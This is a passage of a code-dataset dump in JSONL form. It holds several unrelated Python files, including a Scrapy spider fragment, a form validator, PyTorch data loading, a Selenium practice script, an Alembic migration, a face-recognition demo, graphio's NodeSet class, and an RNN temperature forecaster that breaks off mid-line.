\"//p[@class='plus']/text()|\"\n \"//div[@class='rwp-pros']/p/text()\",\n 'TestCons': \"//div[@class='rwp-cons']/li/text()|\"\n \"//p[@class='minus']/text()|//div[@class='rwp-cons']/p/text()\"\n }\n\n review = self.init_item_by_xpaths(response, 'review', review_xpaths)\n\n if review[\"SourceTestRating\"]:\n review[\"SourceTestScale\"] = TEST_SCALE\n\n if review[\"TestPros\"]:\n review[\"TestPros\"] = review[\"TestPros\"].replace('+', '')\n\n if review[\"TestCons\"]:\n review[\"TestCons\"] = review[\"TestCons\"].replace(u'–', '')\n\n review['DBaseCategoryName'] = 'PRO'\n review[\"ProductName\"] = self.get_product_name(response)\n\n return review\n","sub_path":"alascrapy/spiders/digitalt_tv.py","file_name":"digitalt_tv.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"572257233","text":"# -*- coding: UTF-8 -*-\n#\n# The MIT License\n# \n# Copyright (c) 2012 Felix Schwarz \n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom pycerberus.api import Validator\nfrom pycerberus.i18n import _\n\n\n__all__ = ['MatchingFields']\n\nclass MatchingFields(Validator):\n \n def __init__(self, first_field, second_field, *args, **kwargs):\n self.first_field = first_field\n self.second_field = second_field\n self.super.__init__(*args, **kwargs)\n \n def messages(self):\n return dict(mismatch=_(u'Fields do not match'))\n \n def validate(self, values, context):\n first = values[self.first_field]\n second = values[self.second_field]\n if first != second:\n error = self.exception('mismatch', second, context)\n error_dict = {self.second_field: error}\n self.raise_error('mismatch', values, context, error_dict=error_dict)\n","sub_path":"pycerberus/validators/matching_fields.py","file_name":"matching_fields.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"391832586","text":"from torch.utils.data import DataLoader\nfrom torchvision import transforms, datasets\nfrom config import train_data_dir, test_data_dir, batch_size\n\nnorm_mean = [0.5, 0.5, 0.5]\nnorm_std = [0.3, 0.3, 0.3]\n\ntrain_transform = transforms.Compose([\n transforms.Pad((0, 64), fill=0),\n transforms.Resize(224),\n transforms.RandomRotation(15),\n transforms.RandomHorizontalFlip(0.5),\n transforms.RandomVerticalFlip(0.5),\n transforms.ToTensor(),\n transforms.Normalize(norm_mean, norm_std)\n])\ntest_transform = transforms.Compose([\n transforms.Pad((0, 64), fill=0),\n transforms.Resize(224),\n transforms.ToTensor(),\n transforms.Normalize(norm_mean, norm_std)\n])\n\ntrain_set = datasets.ImageFolder(root=train_data_dir, transform=train_transform)\ntrain_loader = DataLoader(dataset=train_set, batch_size=batch_size, shuffle=True)\n\ntest_set = datasets.ImageFolder(root=test_data_dir, transform=test_transform)\ntest_loader = DataLoader(dataset=train_set, batch_size=batch_size, shuffle=True)\n\nclasses = train_set.classes\nclasses_to_idx = train_set.class_to_idx\n\n\nif __name__ == '__main__':\n print('Num train_set: ', len(train_set))\n print(classes)\n print(classes_to_idx)\n","sub_path":"garbage-classification/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"301315549","text":"from selenium import webdriver\nimport math\nimport time\n\nlink = \"http://suninjuly.github.io/get_attribute.html\"\n\n\ndef calc(x):\n return str(math.log(abs(12 * math.sin(int(x)))))\n\n\ntry:\n # запускаем браузер\n browser = webdriver.Chrome()\n browser.get(link)\n\n # ищем значение Х и подставляем в формулу + записываем это значение в переменную У\n x_element = browser.find_element_by_id(\"treasure\")\n x = x_element.get_attribute(\"valuex\")\n y = calc(x)\n\n # ищем поле и вводим значение\n input1 = browser.find_element_by_id(\"answer\")\n input1.send_keys(y)\n\n # Отмечаем checkbox \"I'm the robot\"\n input2 = browser.find_element_by_id(\"robotCheckbox\")\n input2.click()\n\n # Выбираем radiobutton \"Robots rule!\"\n input3 = browser.find_element_by_id(\"robotsRule\")\n input3.click()\n\n # Нажимаем на кнопку Submit.\n button = browser.find_element_by_css_selector(\".btn\")\n button.click()\n\n\nfinally:\n # ожидание чтобы визуально оценить результаты прохождения скрипта\n time.sleep(15)\n # закрываем браузер после всех манипуляций\n browser.quit()","sub_path":"lesson2.1_step7.py","file_name":"lesson2.1_step7.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"451873140","text":"# coding=ascii\n\"\"\"touch updated references\n\nRevision ID: 3be1ca59b931\nRevises: eb2efcd10cf\nCreate Date: 2017-10-19 14:16:12.345000\n\n\"\"\"\nfrom __future__ import unicode_literals\n\n# revision identifiers, used by Alembic.\nrevision = '3be1ca59b931'\ndown_revision = u'eb2efcd10cf'\n\nimport datetime\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n# cf. 351dc2c86238dae5cfe85c3faa4dcc3e2bd7a651 (183a783fc885_fix_references.py)\n\nIDS = [\n 'Arnasonar-1980',\n 'Buenrostros-1991',\n 'Muller-1858',\n 'Camargo-Bigot-1992',\n 'Kuzmenkov-et-al-2007',\n]\n\nUPDATED = datetime.datetime(2017, 10, 18, 17, 00)\n\n\ndef upgrade():\n source = sa.table('source', sa.column('id'), sa.column('updated', sa.DateTime))\n dt = sa.bindparam('dt', UPDATED)\n touch = sa.update(source, bind=op.get_bind())\\\n .where(source.c.id == sa.bindparam('id_'))\\\n .where(source.c.updated < dt)\\\n .values(updated=dt)\n\n for id_ in IDS:\n touch.execute(id_=id_)\n\n\ndef downgrade():\n pass\n","sub_path":"migrations/versions/3be1ca59b931_touch_updated_references.py","file_name":"3be1ca59b931_touch_updated_references.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"75015130","text":"# Import required modules\nimport cv2 as cv\nimport numpy as np\nimport argparse\nimport time\nimport face_recognition\nimport pickle\nfrom utils.realsense import realsense, rsOptions\nfrom utils.argument import str2bool\nfrom utils.save import saveResult\nfrom utils.draw import drawRecognition\nfrom utils.faceMatch import faceMatch\n\n############ Add argument parser for command line arguments ############\nparser = argparse.ArgumentParser(\n description=\"Face recognition demo with OpenCV, dlib and face_recognition libraries.\"\n)\nparser.add_argument(\n \"--scale\", type=float, default=0.5, help=\"scale factor of input image pre-resize.\"\n)\nparser.add_argument(\n \"--threshold\",\n type=float,\n default=0.6,\n help=\"distance threshold for face recognition.\",\n)\nparser.add_argument(\n \"--pickle\",\n type=str,\n default=\"./pickle/face.pickle\",\n help=\"path to input pickle of faces\",\n)\nparser.add_argument(\n \"--skip\",\n type=str2bool,\n nargs=\"?\",\n const=True,\n default=False,\n help=\"Toggle of process face detection frame by frame.\",\n)\nparser.add_argument(\n \"--info\",\n type=str2bool,\n nargs=\"?\",\n const=True,\n default=False,\n help=\"Toggle of display information in images.\",\n)\nargs = parser.parse_args()\n\n\ndef main():\n # load learned faces\n print(\"[INFO] loading faces ...\")\n # check the image source comes from\n print(\"[INFO] faces loaded from {} ...\".format(args.pickle))\n data = pickle.loads(open(args.pickle, \"rb\").read())\n\n # Initialize some variables\n face_locations = []\n process_this_frame = True\n flagCapture = False\n\n # Create a new named window\n kWinName = \"Face recognition demo\"\n\n # Start RealSense Camera\n options = rsOptions()\n options.enableColor = True\n options.resColor = [1280, 720]\n rs = realsense(options)\n rs.deviceInitial()\n\n try:\n while True:\n # Save program start time\n if args.skip is True:\n if process_this_frame:\n start_time = time.time()\n else:\n start_time = time.time()\n\n # Read frame\n rs.getFrame()\n frame = rs.imageColor\n if not frame.any():\n cv.waitKey()\n break\n\n # Resize frame of video to 1/2 size for faster face recognition processing\n small_frame = cv.resize(frame, (0, 0), fx=args.scale, fy=args.scale)\n\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n rgb_small_frame = small_frame[:, :, ::-1]\n\n if args.skip is True:\n # Only process every other frame of video to save time\n if process_this_frame:\n face_locations, face_names = faceMatch(\n rgb_small_frame, data, args.threshold\n )\n process_this_frame = not process_this_frame\n else:\n face_locations, face_names = faceMatch(\n rgb_small_frame, data, args.threshold\n )\n\n # Display the results\n drawRecognition(frame, face_locations, face_names, args.scale)\n\n # Calculate processing time\n if args.skip is True:\n if not process_this_frame:\n label = \"Process time: %.2f ms\" % ((time.time() - start_time) * 500)\n else:\n label = \"Process time: %.2f ms\" % ((time.time() - start_time) * 1000)\n\n # Display infomation\n if args.info is True:\n # if not process_this_frame:\n # print(\"[INFO] \" + label)\n cv.putText(\n frame, label, (0, 30), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 255)\n )\n\n # Display the frame\n cv.imshow(kWinName, frame)\n\n # Process screen capture\n if flagCapture:\n print(\"[INFO] Screen captured\")\n saveResult(frame, \"recognition_rs\")\n flagCapture = False\n\n # Keyboard commands\n getKey = cv.waitKey(1) & 0xFF\n if getKey is ord(\"c\") or getKey is ord(\"C\"):\n flagCapture = True\n elif getKey is ord(\"q\") or getKey is ord(\"Q\"):\n break\n\n except Exception as e:\n print(e)\n pass\n\n finally:\n # Stop streaming\n cv.destroyAllWindows()\n rs.pipeline.stop()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/recognition_rs.py","file_name":"recognition_rs.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"415076842","text":"#Trapping Rain Water by Viplav Patil by own\n\ndef leftmaxx(i,arr):\n leftmax = 0\n\n if i == 0:\n leftmax = arr[i]\n return leftmax\n else:\n leftmax = max(arr[0:i+1])\n return leftmax\n\n \n\ndef rightmaxx(i,n,arr):\n rightmax = 0\n\n if i == n-1:\n rightmax = arr[i]\n return rightmax\n else:\n rightmax = max(arr[i:n])\n return rightmax\n\n\ndef water_trapping_quantity(arr,n):\n trapped_quantity = 0\n for i in range(n):\n current_num = arr[i]\n\n\n leftmax = leftmaxx(i,arr)\n rightmax = rightmaxx(i,n,arr)\n\n #print(leftmax)\n #print(rightmax)\n #print(\"\\n\")\n \n temp = min(leftmax,rightmax) - current_num\n if temp < 0:\n temp = 0\n\n trapped_quantity += temp \n #print(trapped_quantity)\n\n print(\"trapped water quantity is {}\".format(trapped_quantity))\n\n \n\n\n\n\nif __name__ == '__main__':\n arr = [3, 0, 2, 0, 4]\n water_trapping_quantity(arr,len(arr))\n\n\n'''\nhttps://www.youtube.com/watch?v=7stXjaFwOCk\n\n\nT.c = O(n-square) because everytime unordered array is scanned for each item to find either leftmax or rightmax\n\nS.C = O(1)\n\n\n\n\nhttps://www.geeksforgeeks.org/trapping-rain-water/\n\n'''","sub_path":"mycodes/arrays/p20/p20.py","file_name":"p20.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"166735054","text":"import logging\nfrom uuid import uuid4\nimport os\nimport json\nimport csv\nimport gzip\nfrom collections import defaultdict\n\nfrom graphio.helper import chunks, create_single_index, create_composite_index\nfrom graphio import defaults\nfrom graphio.queries import nodes_create_unwind, nodes_merge_unwind, nodes_merge_unwind_preserve, nodes_merge_unwind_array_props, \\\n nodes_merge_unwind_preserve_array_props\nfrom graphio.graph import run_query_return_results\n\nlog = logging.getLogger(__name__)\n\n# dict with python types to casting functions in Cypher\nCYPHER_TYPE_TO_FUNCTION = {int: 'toInteger',\n float: 'toFloat'}\n\n\nclass NodeSet:\n \"\"\"\n Container for a set of Nodes with the same labels and the same properties that define uniqueness.\n \"\"\"\n\n def __init__(self, labels, merge_keys=None, batch_size=None, default_props=None, preserve=None, append_props=None, indexed=False):\n \"\"\"\n\n :param labels: The labels for the nodes in this NodeSet.\n :type labels: list[str]\n :param merge_keys: The properties that define uniqueness of the nodes in this NodeSet.\n :type merge_keys: list[str]\n :param batch_size: Batch size for Neo4j operations.\n :type batch_size: int\n \"\"\"\n self.labels = labels\n self.merge_keys = merge_keys\n self.default_props = default_props\n self.preserve = preserve\n self.append_props = append_props\n self.indexed = indexed\n\n self.combined = '_'.join(sorted(self.labels)) + '_' + '_'.join(sorted(self.merge_keys))\n self.uuid = str(uuid4())\n\n if batch_size:\n self.batch_size = batch_size\n else:\n self.batch_size = defaults.BATCHSIZE\n\n self.nodes = []\n # a node index with merge_key_id -> [positions in nodes list]\n # this works for both unique and non-unique settings\n self.node_index = defaultdict(list)\n\n def __str__(self):\n return f\"\"\n\n def _merge_key_id(self, node_dict: dict) -> tuple:\n \"\"\"\n Create a FrozenSet from an ordered list of the merge_key properties for a node.\n\n :param node_dict: A node dict.\n :return:\n \"\"\"\n return tuple([node_dict[key] for key in self.merge_keys])\n\n def add_node(self, properties):\n \"\"\"\n Create a node in this NodeSet.\n\n :param properties: Node properties.\n :type properties: dict\n \"\"\"\n if self.default_props:\n node_props = {**self.default_props, **properties}\n else:\n node_props = properties\n\n self.nodes.append(node_props)\n\n if self.indexed:\n self.node_index[self._merge_key_id(properties)].append(len(self.nodes) - 1)\n\n def add_nodes(self, list_of_properties):\n for properties in list_of_properties:\n self.add_node(properties)\n\n def update_node(self, properties: dict):\n \"\"\"\n Update an existing node by overwriting all properties.\n\n Note that this requires `NodeSet(..., indexed=True)` which is not the default!\n\n :param properties: Node property dictionary.\n \"\"\"\n if not self.indexed:\n raise TypeError(\"Update only works on an indexed NodeSet.\")\n\n node_merge_key_id = self._merge_key_id(properties)\n if node_merge_key_id in self.node_index:\n # this function should work for single and multiple nodes\n for node_list_index in self.node_index[node_merge_key_id]:\n self.nodes[node_list_index].update(properties)\n # if the node does not exist it is created\n else:\n self.add_node(properties)\n\n def add_unique(self, properties):\n \"\"\"\n Add a node to this NodeSet only if a node with the same `merge_keys` does not exist yet.\n\n Note: Right now this function iterates all nodes in the NodeSet. This is of course slow for large\n numbers of nodes. A better solution would be to create an 'index' as is done for RelationshipSet.\n\n :param properties: Node properties.\n :type properties: dict\n \"\"\"\n\n compare_values = frozenset([properties[key] for key in self.merge_keys])\n\n for other_node_properties in self.node_properties():\n this_values = frozenset([other_node_properties[key] for key in self.merge_keys])\n if this_values == compare_values:\n return None\n\n # add node if not found\n self.add_node(properties)\n\n def to_dict(self):\n \"\"\"\n Create dictionary defining the nodeset.\n \"\"\"\n return {\"labels\": self.labels, \"merge_keys\": self.merge_keys, \"nodes\": self.nodes}\n\n @classmethod\n def from_dict(cls, nodeset_dict, batch_size=None):\n ns = cls(labels=nodeset_dict[\"labels\"], merge_keys=nodeset_dict[\"merge_keys\"])\n ns.add_nodes(nodeset_dict[\"nodes\"])\n return ns\n\n def to_csv(self, filepath: str, filename: str = None, quoting: int = None) -> str:\n \"\"\"\n Create a CSV file for this nodeset.\n\n :param filepath: Path where the file is stored.\n :param filename: Optional filename. A filename will be autocreated if not passed.\n :param quoting: Optional quoting setting for csv writer (any of csv.QUOTE_MINIMAL, csv.QUOTE_NONE, csv.QUOTE_ALL etc).\n \"\"\"\n if not filename:\n filename = f\"{self.object_file_name()}.csv\"\n if not quoting:\n quoting = csv.QUOTE_MINIMAL\n\n csv_file_path = os.path.join(filepath, filename)\n\n log.debug(f\"Create CSV file {csv_file_path}\")\n\n all_props = self.all_properties_in_nodeset()\n\n with open(csv_file_path, 'w', newline='') as csvfile:\n fieldnames = list(all_props)\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames, quoting=quoting)\n\n writer.writeheader()\n\n for n in self.nodes:\n writer.writerow(dict(n))\n\n return csv_file_path\n\n def create_csv_query(self, filename: str = None, periodic_commit=1000):\n\n # get types\n property_types = self._estimate_type_of_property_values()\n\n if not filename:\n filename = f\"{self.object_file_name()}.csv\"\n\n q = \"USING PERIODIC COMMIT {}\\n\".format(periodic_commit)\n q += \"LOAD CSV WITH HEADERS FROM 'file:///{}' AS line\\n\".format(filename)\n q += \"CREATE (n:{})\\n\".format(':'.join(self.labels))\n\n props_list = []\n for k in sorted(self.all_properties_in_nodeset()):\n prop_type = property_types[k]\n if prop_type in CYPHER_TYPE_TO_FUNCTION:\n props_list.append(f\"n.{k} = {CYPHER_TYPE_TO_FUNCTION[prop_type]}(line.{k})\")\n else:\n props_list.append(f\"n.{k} = line.{k}\")\n\n q += \"SET {}\".format(', '.join(props_list))\n\n return q\n\n def merge_csv_query(self, filename: str = None, periodic_commit=1000):\n # get types\n property_types = self._estimate_type_of_property_values()\n\n if not filename:\n filename = f\"{self.object_file_name()}.csv\"\n\n merge_csv_query_elements = []\n for merge_key in self.merge_keys:\n prop_type = property_types[merge_key]\n if prop_type in CYPHER_TYPE_TO_FUNCTION:\n merge_csv_query_elements.append(f\"{merge_key}: {CYPHER_TYPE_TO_FUNCTION[prop_type]}(line.{merge_key})\")\n else:\n merge_csv_query_elements.append(f\"{merge_key}: line.{merge_key}\")\n merge_csv_query_string = ','.join(merge_csv_query_elements)\n\n q = \"USING PERIODIC COMMIT {}\\n\".format(periodic_commit)\n q += \"LOAD CSV WITH HEADERS FROM 'file:///{}' AS line\\n\".format(filename)\n q += f\"MERGE (n:{':'.join(self.labels)} {{ {merge_csv_query_string} }})\\n\"\n\n props_list = []\n for k in sorted(self.all_properties_in_nodeset()):\n prop_type = property_types[k]\n if prop_type in CYPHER_TYPE_TO_FUNCTION:\n props_list.append(f\"n.{k} = {CYPHER_TYPE_TO_FUNCTION[prop_type]}(line.{k})\")\n else:\n props_list.append(f\"n.{k} = line.{k}\")\n\n q += \"SET {}\".format(', '.join(props_list))\n\n return q\n\n\n @classmethod\n def from_csv_json_set(cls, csv_file_path, json_file_path, load_items:bool = False):\n \"\"\"\n Read the default CSV/JSON file combination.\n\n Needs paths to CSV and JSON file.\n\n :param csv_file_path: Path to the CSV file.\n :param json_file_path: Path to the JSON file.\n :param load_items: Yield items from file (False, default) or load them to memory (True).\n :return: The NodeSet.\n \"\"\"\n with open(json_file_path) as f:\n metadata = json.load(f)\n\n # Some legacy files use 'merge_keys' instead of 'mergekeys' (like the property of the\n # NodeSet constructor), check if that is true and use 'merge_keys' later.\n # Do not parameterize this in future, just safe guard against common type.\n mergekeys_json_key = 'mergekeys'\n if 'merge_keys' in metadata:\n mergekeys_json_key = 'merge_keys'\n\n # map properties\n property_map = None\n if 'property_map' in metadata:\n # replace mergekeys if necessary\n property_map = metadata['property_map']\n metadata[mergekeys_json_key] = [property_map[x] if x in property_map else x for x in metadata[mergekeys_json_key]]\n\n # NodeSet instance\n nodeset = cls(metadata['labels'], merge_keys=metadata[mergekeys_json_key])\n\n if load_items:\n nodeset.nodes = _read_nodes(csv_file_path, property_map)\n else:\n nodeset.nodes = _yield_node(csv_file_path, property_map)\n\n return nodeset\n\n\n def object_file_name(self, suffix: str = None) -> str:\n \"\"\"\n Create a unique name for this NodeSet that indicates content. Pass an optional suffix.\n NOTE: suffix has to include the '.' for a filename!\n\n `nodeset_Label_merge-key_uuid`\n\n With suffix:\n\n `nodeset_Label_merge-key_uuid.json`\n \"\"\"\n basename = f\"nodeset_{'_'.join(self.labels)}_{'_'.join(self.merge_keys)}_{self.uuid}\"\n if suffix:\n basename += suffix\n return basename\n\n def serialize(self, target_dir: str):\n \"\"\"\n Serialize NodeSet to a JSON file in a target directory.\n\n This function is meant for dumping/reloading and not to create a general transport\n format. The function will likely be optimized for disk space or compressed in future.\n \"\"\"\n path = os.path.join(target_dir, self.object_file_name(suffix='.json'))\n with open(path, 'wt') as f:\n json.dump(self.to_dict(), f, indent=4)\n\n def create(self, graph, database:str = None, batch_size=None):\n \"\"\"\n Create all nodes from NodeSet.\n \"\"\"\n log.debug('Create NodeSet')\n if not batch_size:\n batch_size = self.batch_size\n log.debug('Batch Size: {}'.format(batch_size))\n\n q = nodes_create_unwind(self.labels)\n\n for batch in chunks(self.nodes, size=batch_size):\n run_query_return_results(graph, q, database=database, props=list(batch))\n\n def merge(self, graph, merge_properties=None, batch_size=None, preserve=None, append_props=None, database=None):\n \"\"\"\n Merge nodes from NodeSet on merge properties.\n\n :param merge_properties: The merge properties.\n \"\"\"\n # overwrite if preserve is passed\n if preserve:\n self.preserve = preserve\n # overwrite if array_props is passed\n if append_props:\n self.append_props = append_props\n\n log.debug('Merge NodeSet on {}'.format(merge_properties))\n\n if not batch_size:\n batch_size = self.batch_size\n\n if not merge_properties:\n merge_properties = self.merge_keys\n\n log.debug('Batch Size: {}'.format(batch_size))\n\n # use py2neo base functions if no properties are preserved\n if not self.preserve and not self.append_props:\n q = nodes_merge_unwind(self.labels, self.merge_keys)\n for batch in chunks(self.node_properties(), size=batch_size):\n run_query_return_results(graph, q, database=database, props=list(batch))\n\n elif self.preserve and not self.append_props:\n q = nodes_merge_unwind_preserve(self.labels, self.merge_keys, property_parameter='props')\n for batch in chunks(self.node_properties(), size=batch_size):\n run_query_return_results(graph, q, database=database, props=list(batch), preserve=self.preserve)\n\n elif not self.preserve and self.append_props:\n q = nodes_merge_unwind_array_props(self.labels, self.merge_keys, self.append_props,\n property_parameter='props')\n for batch in chunks(self.node_properties(), size=batch_size):\n run_query_return_results(graph, q, database=database, props=list(batch), append_props=self.append_props)\n\n elif self.preserve and self.append_props:\n\n q = nodes_merge_unwind_preserve_array_props(self.labels, self.merge_keys, self.append_props, self.preserve,\n property_parameter='props')\n for batch in chunks(self.node_properties(), size=batch_size):\n run_query_return_results(graph, q, database=database, props=list(batch), append_props=self.append_props, preserve=self.preserve)\n\n def node_properties(self):\n \"\"\"\n Yield properties of the nodes in this set. Used for create function.\n \"\"\"\n for n in self.nodes:\n yield dict(n)\n\n def all_properties_in_nodeset(self):\n \"\"\"\n Return a set of all property keys in this NodeSet\n\n :return: A set of unique property keys of a NodeSet\n \"\"\"\n all_props = set()\n\n # collect properties\n for props in self.node_properties():\n for k in props:\n all_props.add(k)\n\n return all_props\n\n def _estimate_type_of_property_values(self):\n \"\"\"\n To create data from CSV we need to know the type of all node properties.\n\n This function tries to find the type and falls back to string if it's not consistent. For performance reasons\n this function is limited to the first 1000 nodes.\n\n :return:\n \"\"\"\n property_types = {}\n for p in self.all_properties_in_nodeset():\n this_type = None\n for node in self.nodes[:1000]:\n try:\n value = node[p]\n type_of_value = type(value)\n except KeyError:\n type_of_value = None\n\n if not this_type:\n this_type = type_of_value\n else:\n if this_type != type_of_value:\n this_type = str\n break\n\n property_types[p] = this_type\n\n return property_types\n\n def create_index(self, graph, database=None):\n \"\"\"\n Create indices for all label/merge ky combinations as well as a composite index if multiple merge keys exist.\n\n In Neo4j 3.x recreation of an index did not raise an error. In Neo4j 4 you cannot create an existing index.\n\n Index creation syntax changed from Neo4j 3.5 to 4. So far the old syntax is still supported. All py2neo\n functions (v4.4) work on both versions.\n \"\"\"\n if self.merge_keys:\n for label in self.labels:\n # create individual indexes\n for prop in self.merge_keys:\n create_single_index(graph, label, prop, database)\n\n # composite indexes\n if len(self.merge_keys) > 1:\n create_composite_index(graph, label, self.merge_keys, database)\n\n\ndef _read_nodes(csv_filepath, property_map):\n \"\"\"\n Instead of recreating the entire RelationShip set in memory this function yields\n one relationship at a time.\n\n :param csv_filepath: Path to the CSV file.\n :param property_map: Property map to rename properties.\n :return: One node property dict per iteration.\n \"\"\"\n\n if csv_filepath.endswith('.gz'):\n csvfile = gzip.open(csv_filepath, 'rt')\n else:\n csvfile = open(csv_filepath, newline='')\n lines = csvfile.readlines()\n csvfile.close()\n\n # get header line\n header = lines[0].strip().split(',')\n header = [x.replace('\"', '') for x in header]\n\n log.debug(f\"Header: {header}\")\n\n if property_map:\n log.debug(f\"Replace header {header}\")\n header = [property_map[x] if x in property_map else x for x in header]\n log.debug(f\"With header {header}\")\n\n nodes = []\n rdr = csv.DictReader(lines[1:], fieldnames=header)\n for node in rdr:\n nodes.append(node)\n\n return nodes\n\n\ndef _yield_node(csv_filepath, property_map):\n \"\"\"\n Instead of recreating the entire RelationShip set in memory this function yields\n one relationship at a time.\n\n :param csv_filepath: Path to the CSV file.\n :param property_map: Property map to rename properties.\n :return: One node property dict per iteration.\n \"\"\"\n\n if csv_filepath.endswith('.gz'):\n csvfile = gzip.open(csv_filepath, 'rt')\n else:\n csvfile = open(csv_filepath, newline='')\n\n # get header line\n header = None\n while not header:\n line = csvfile.readline()\n if not line.startswith('#'):\n header = line.strip().split(',')\n header = [x.replace('\"', '') for x in header]\n log.debug(f\"Header: {header}\")\n\n if property_map:\n log.debug(f\"Replace header {header}\")\n header = [property_map[x] if x in property_map else x for x in header]\n log.debug(f\"With header {header}\")\n\n rdr = csv.DictReader([row for row in csvfile if not row.startswith('#')], fieldnames=header)\n for node in rdr:\n yield node\n csvfile.close()","sub_path":"graphio/objects/nodeset.py","file_name":"nodeset.py","file_ext":"py","file_size_in_byte":18118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"512054008","text":"import asyncio\nfrom autobahn.asyncio.wamp import ApplicationSession\n\nclass MonitorComponent(ApplicationSession):\n \n async def onJoin(self, details):\n print(\"session ready\")\n \n def log(thing):\n print(str(thing))\n \n try:\n await self.register(log, u\"tirith.log\")\n print (\"procedure registered\")\n except Exception as e:\n print (\"could not register procedure: {0}\".format(e))","sub_path":"tirith/components/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"620444742","text":"import torch\nfrom torch import nn\nfrom torch.utils.data import Dataset, DataLoader, random_split\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom rnn import RNN\nfrom torch_utils import NN, validation_regress\nfrom AMAL_tp4_datasets import DataHolder\n\n\n##############################################################################\n#### Networks\n##############################################################################\n\n## entrées sous forme length × batch × dim\n\nclass SequenceForecaster(nn.Module):\n def __init__(self, inDim, hidenDim, fc_layers, outDim):\n super().__init__()\n self.inDim, self.hidenDim, self.fc_layers , self.outDim = inDim, hidenDim, fc_layers, outDim\n\n self.rnn = RNN(inDim, hidenDim)\n self.fc = NN(hidenDim, outDim, fc_layers)\n\n def forward(self, x): ## x : batch*seq_len*inDim\n h = - torch.ones(self.hidenDim) ## valeur unique (donées normalisées entre 0 et 1)\n x = x.view(x.shape[0], x.shape[1], self.inDim)\n x.transpose_(0,1) ## now x : seq_len*batch*inDim\n x = self.rnn(x, h, many_to_many=True)\n x = self.fc(x)\n x.transpose_(0,1) ## now x : batch*seq_len*inDim\n return x\n\n\n\n##############################################################################\n#### main\n##############################################################################\n\nif __name__==\"__main__\":\n ## imports :\n from torch.utils.tensorboard import SummaryWriter\n import os\n import pickle as pkl\n\n ## load dataset temperatures :\n path=\"./tempAMAL_train.csv\"\n max_sample_length = 500\n train_batch = 100\n test_batch = 100\n\n max_num_city = 2\n one_city = False ## tels if temp curves are considered one by one or not\n\n data_holder = DataHolder(mega_sample_length=max_sample_length, train_val_test_split=(.6,.2,.2), path=path, max_num_city=max_num_city)\n print(data_holder.cities)\n\n def get_dataloaders(sample_length, strides):\n train_dataset, val_dataset, test_dataset = data_holder.get_datasets_forecast(sample_length, strides=strides, one_city=one_city)\n train_dataloader = DataLoader(train_dataset, shuffle=True, drop_last=True, batch_size=train_batch)\n val_dataloader = DataLoader( val_dataset, shuffle=True, drop_last=True, batch_size= test_batch)\n test_dataloader = DataLoader( test_dataset, shuffle=True, drop_last=True, batch_size= test_batch)\n return train_dataloader, val_dataloader, test_dataloader\n\n ## On commence par des s&quences courtes (3) :\n train_dataloader, val_dataloader, test_dataloader = get_dataloaders(10, strides=[5,10,10])\n if train_dataloader.__len__()==0 or test_dataloader.__len__()==0:\n raise AttributeError\n\n ## network definition :\n if not one_city:\n inDim = 3 + data_holder.get_num_classes() # température * month * day * hour\n else:\n inDim = 3 + 1\n outDim = inDim\n hidenDim = 35#2*outDim\n fc_layers = [] #[2*outDim]\n net = SequenceForecaster(inDim=inDim, hidenDim=hidenDim, outDim=outDim, fc_layers=fc_layers)\n loss_func = nn.MSELoss()\n\n ## optimizer :\n optimizer = torch.optim.Adam(params=net.parameters(), lr=0.005, betas=(.9, .999), eps=10**-8)\n #optimizer = torch.optim.SGD(params=net.parameters() , lr=.01, momentum=.9)\n\n ## display params :\n N = 10000\n loss_freq = 1 # in number of epochs\n save_model_freq= 1\n histogram_freq = 1\n test_freq = 1\n\n ## Savers :\n ONLY_SAVE_BEST_MODEL = True\n writer = SummaryWriter()\n MODEL_SAVE_PATH = 'best_model.pkl'\n print(MODEL_SAVE_PATH)\n if os.path.isfile(MODEL_SAVE_PATH):\n with open(MODEL_SAVE_PATH, 'rb') as f:\n SAVED_MODEL = pkl.load(f)\n net.load_state_dict(SAVED_MODEL['params'], strict=True)\n optimizer.load_state_dict(SAVED_MODEL['optimizer'])\n print('model loaded from 